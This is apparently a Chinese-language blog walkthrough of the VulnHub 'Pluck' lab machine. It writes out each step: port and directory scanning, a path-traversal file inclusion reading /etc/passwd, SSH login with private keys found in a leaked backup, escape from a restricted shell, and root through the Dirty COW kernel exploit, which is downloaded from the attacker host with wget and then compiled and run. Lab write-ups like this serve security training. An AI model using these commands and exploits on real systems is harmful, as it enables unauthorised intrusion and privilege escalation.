VulnHub - Pluck

环境说明:

Kali:172.21.137.232
靶机:172.21.137.224

渗透过程:

1、首先要找到靶机IP,arp-scan -l命令扫一下,发现靶机172.21.137.224(其实不用扫,这个靶机开启后就直接显示在上面了)
VulnHub - Pluck_第1张图片
2、找到IP后,用Nmap扫一下端口,查看开的各类服务nmap -n -Pn -sV --open -p- -T4 172.21.137.224
VulnHub - Pluck_第2张图片
3、简单信息搜集后,逐一访问端口,发现仅有80端口渗透价值较大
VulnHub - Pluck_第3张图片
4、直接用dirsearch ./dirsearch.py --random-agents -u 'http://172.21.137.224/' -e *扫下目录,有admin.php可访问,未扫出更有价值的路径,直接手动在主页找吧
VulnHub - Pluck_第4张图片
5、先进主页,上面有几个标签,点下CONTACT US,发现链接处可能会有熟悉的文件包含漏洞
VulnHub - Pluck_第5张图片
6、直接修改page参数,经几次修改,发现可读本地文件../../../etc/passwd
VulnHub - Pluck_第6张图片
7、从上图看到passwd文件最下方有个backup.sh的文件路径,用文件包含访问
VulnHub - Pluck_第7张图片
8、根据所给的提示,直接用tftp下载/backups/backup.tar文件并解压出来,会有home和var目录
VulnHub - Pluck_第8张图片
在这里插入图片描述
9、查看了var目录,仅仅是网页源码,而且是没有链接数据库的,纯静态网页,好家伙,忽悠我半天,整活技术独一枝。

10、再去看看home目录,有三个人名的目录,逐一查看,只有paul的key目录下有公私钥
在这里插入图片描述
11、很明显要用其中一个私钥登录,用命令ssh -i id_key4 [email protected]即可登录到一个限制的SHELL中
VulnHub - Pluck_第9张图片
12、都试下来,猜测可能再哪一块可通过命令注入来逃逸当前的SHELL,进入Edit file,尝试用VIM逃逸方法,输入!/bin/bash!/bin/sh逃逸,但失败了,有点难过
VulnHub - Pluck_第10张图片
VulnHub - Pluck_第11张图片
13、这里不行的话,试试在外面输入;/bin/bash
VulnHub - Pluck_第12张图片
14、之后会进入VIM页面,看似没成功,其实退出VIM,就成功逃逸了
VulnHub - Pluck_第13张图片
15、最终逃不过要提权,让我来康康小机子是啥版本的,uname -a给我冲!
在这里插入图片描述
16、本着一把梭结束任务的我,康康对应的POC,发现有脏牛!
VulnHub - Pluck_第14张图片
17、那么先试试,不试怎么知道我不行呢?对吧

18、先下载POC到KALI,命令wget https://www.exploit-db.com/download/40616,记得重命名为40616.c,下一步要编译

19、看了下POC源码,编译命令为gcc cowroot.c -o cowroot -pthread,这里文件名改成我们的就行了
VulnHub - Pluck_第15张图片

20、命令gcc 40616.c -o 40616 -pthread编译完成,会有一个40616文件
VulnHub - Pluck_第16张图片

21、接下来确认下paul有wget可用,那就好说了
在这里插入图片描述
22、kali用命令python -m http.server 9091开端口,paul再/tmp/目录下用命令wget http://172.21.137.232:9091/40616下载
在这里插入图片描述
VulnHub - Pluck_第17张图片
23、下载好后,并赋予执行权限chmod 755 40616
在这里插入图片描述
24、最后执行,运气好!直接成功!结束:)
VulnHub - Pluck_第18张图片
PS:
1、最后几步要注意下,POC要用的是exploit db 的POC,而不是用工具检测出来的那个,附上地址。(该POC不知道什么原因,可以成功,但是连一会儿会断掉,靶机也会崩溃)

**
2、最后提权还有一个方法,通过找以ROOT权限运行的二进制文件来提权,最后用命令sh 39535.sh即可,这里就不写具体过程了,试过完全可行,而且稳定,参考链接里面有,顺便用该方法补上flag的截图。**
VulnHub - Pluck_第19张图片

参考链接:

  • https://g0blin.co.uk/pluck-vulnhub-writeup/
  • https://securitybytes.io/vulnhub-com-pluck-vm-walkthrough-90a6eb70dab9
  • https://www.rootnetsec.com/vulnhub-pluck/
  • https://www.vulnhub.com/entry/pluck-1,178/

你可能感兴趣的:(VulnHub - Pluck)